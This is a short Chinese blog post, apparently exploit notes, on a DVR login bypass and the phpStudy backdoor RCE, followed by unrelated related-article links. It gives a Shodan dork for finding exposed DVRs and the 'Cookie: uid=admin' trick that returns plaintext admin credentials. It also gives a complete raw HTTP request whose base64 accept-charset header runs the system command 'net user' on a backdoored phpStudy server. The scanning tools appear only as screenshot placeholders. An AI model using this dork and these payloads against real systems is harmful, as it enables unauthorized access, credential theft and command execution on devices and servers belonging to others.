DVR登录绕过漏洞&&phpstudy后门rce

简介: DVR登录绕过漏洞&&phpstudy后门rce

DVR登录绕过漏洞

漏洞描述

此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。

关键词搜索

shodan:

html:"/login.rsp"

知识星球中有shodan高级会员

640.png

image-20220301113022936

640.png

image-20220301102651333

漏洞利用

利用易语言写的工具进行检测

640.png

image-20220301101414698

利用python脚本进行检测

640.png

image-20220301101937090

phpstudy后门rce

phpstudy rce这个大家应该都知道的吧

包 :

GET / HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate Upgrade-Insecure-Requests: 1

漏洞利用

python脚本进行检测

640.png

image-20220301112046609

利用易语言写的工具进行检测

640.png

image-202203011127230

相关文章
|
网络协议 网络安全 Python
Python网络编程基础(Socket编程) 错误处理和异常
【4月更文挑战第10天】网络编程涉及到很多复杂的操作和潜在的风险,如连接失败、数据丢失、超时等问题。因此,正确的错误处理和异常捕获是确保网络程序稳定性和可靠性的关键。本章将介绍网络编程中常见的错误和异常,并探讨如何在Python中进行有效的错误处理。
|
存储 SQL Java
技术心得记录:压缩包Zip格式详析(全网最详细)
技术心得记录:压缩包Zip格式详析(全网最详细)
|
前端开发 网络安全
【XSS平台】使用,网络安全开发必学
【XSS平台】使用,网络安全开发必学
|
10月前
|
安全 应用服务中间件 开发工具
Web安全-SVN信息泄露漏洞分析
Web安全-SVN信息泄露漏洞分析
590 2
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
423 1
|
11月前
|
安全 网络安全 数据安全/隐私保护
uniapp实战 —— 竖排多级分类展示
uniapp实战 —— 竖排多级分类展示
250 0
|
数据安全/隐私保护
BUUCTF---[SWPU2019]神奇的二维码
BUUCTF---[SWPU2019]神奇的二维码
|
安全 数据安全/隐私保护 开发者
APP备案须知
随着智能手机普及和移动互联网发展,APP市场规模扩大,企业及开发者需在发布前进行APP备案。中国规定,提供互联网信息服务的APP须按《互联网信息服务管理办法》备案,以规范市场、保护用户权益和维护国家安全。备案流程包括在国家互联网信息办公室系统填写APP信息、提交证件材料,并确保信息真实合法。备案能提升用户信任度,增加APP市场信用,是合法经营和保障用户权益的基础。
441 0
|
安全 网络安全
定级备案是什么,通信网络单元定级备案怎么做
定级备案适用主体:定级备案对象是指持有“增值电信业务许可证”的企业。取得增值电信业务经营许可证的企业,例如持有ICP、EDI的企业都应开展增值电信网络单元定级备案工作,针对的是与电信业务服务相关的网络和信息系统,如果不按照管局的要求开展通信网络单元定级备案,轻则罚款,重则停业整顿,甚至列入失信名单。